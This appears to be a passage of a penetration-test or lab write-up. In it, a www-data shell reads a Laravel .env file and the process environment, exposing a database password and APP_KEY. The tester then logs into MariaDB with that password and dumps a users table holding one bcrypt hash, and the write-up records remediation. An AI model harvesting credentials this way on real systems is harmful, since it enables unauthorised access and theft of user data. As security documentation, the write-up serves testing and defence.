Database


PEAS has identified that the DB credential for the target Laravel instance is readable by `www-data`, both in the application's `.env` file and in the environment variables of the web server process.

www-data@debian:/var/www/html/lavita$ cat .env
APP_NAME=LaVita
APP_ENV=local
APP_KEY=base64:zfXJipTpbCyrZHRDpn0/NmdpHTbAl7/hCMf476EP1LU=
APP_DEBUG=true
APP_URL=http://hb02.onsec
 
LOG_CHANNEL=stack
LOG_LEVEL=debug
 
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=lavita
DB_USERNAME=lavita
DB_PASSWORD=sdfquelw0kly9jgbx92
 
BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120
 
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
 
MAIL_MAILER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"
 
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=
 
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
 
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
 
 
www-data@debian:/var/www/html/lavita$ env
env
DB_PASSWORD=sdfquelw0kly9jgbx92
MAIL_PORT=2525
REDIS_PASSWORD=null
LOG_LEVEL=debug
REDIS_HOST=127.0.0.1
AWS_DEFAULT_REGION=us-east-1
MIX_PUSHER_APP_CLUSTER=mt1
PWD=/var/www/html/lavita
CACHE_DRIVER=file
MAIL_FROM_ADDRESS=null
DB_PORT=3306
MAIL_MAILER=smtp
APACHE_LOG_DIR=/var/log/apache2
LANG=C
MAIL_USERNAME=null
PUSHER_APP_CLUSTER=mt1
APP_KEY=base64:zfXJipTpbCyrZHRDpn0/NmdpHTbAl7/hCMf476EP1LU=
APP_ENV=local
MAIL_PASSWORD=null
APP_DEBUG=true
AWS_SECRET_ACCESS_KEY=
INVOCATION_ID=b7df21ee0b3b4c35b6dc321a03d992b2
APP_URL=http://hb02.onsec
APACHE_PID_FILE=/var/run/apache2/apache2.pid
DB_USERNAME=lavita
PUSHER_APP_ID=
DB_CONNECTION=mysql
TERM=xterm-256color
DB_HOST=127.0.0.1
PUSHER_APP_KEY=
APACHE_RUN_GROUP=www-data
PUSHER_APP_SECRET=
MIX_PUSHER_APP_KEY=
APACHE_LOCK_DIR=/var/lock/apache2
APP_NAME=LaVita
SHLVL=2
AWS_ACCESS_KEY_ID=
LOG_CHANNEL=stack
QUEUE_CONNECTION=sync
BROADCAST_DRIVER=log
MAIL_FROM_NAME=LaVita
AWS_BUCKET=
REDIS_PORT=6379
APACHE_RUN_DIR=/var/run/apache2
SESSION_DRIVER=file
JOURNAL_STREAM=8:11424
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MAIL_ENCRYPTION=null
MAIL_HOST=smtp.mailtrap.io
DB_DATABASE=lavita
SESSION_LIFETIME=120
_=/usr/bin/env
OLDPWD=/var/www

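DB credential identified: `lavita:sdfquelw0kly9jgbx92`. The password must be checked for reuse. The same output also exposes `APP_KEY` and shows `APP_DEBUG=true` with `APP_ENV=local`; these should be recorded as separate findings, and both the DB password and the `APP_KEY` should be treated as compromised and rotated during remediation.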

www-data@debian:/var/www/html/lavita$ mysql -ulavita -psdfquelw0kly9jgbx92
 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 
MariaDB [(none)]> use lavita;
use lavita;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

Session established

MariaDB [lavita]> SELECT name,password FROM users;
SELECT name,password FROM users;
+------+--------------------------------------------------------------+
| name | password                                                     |
+------+--------------------------------------------------------------+
| test | $2y$10$KJn5GEnDVdE/lrVSrC/3LOmgwW4x3czcRphMJEDr3H97M1CQ8a90q |
+------+--------------------------------------------------------------+
1 row in set (0.000 sec)

The `users` table contains no user other than the `test` account, whose password is stored as a bcrypt hash (`$2y$` prefix, cost 10).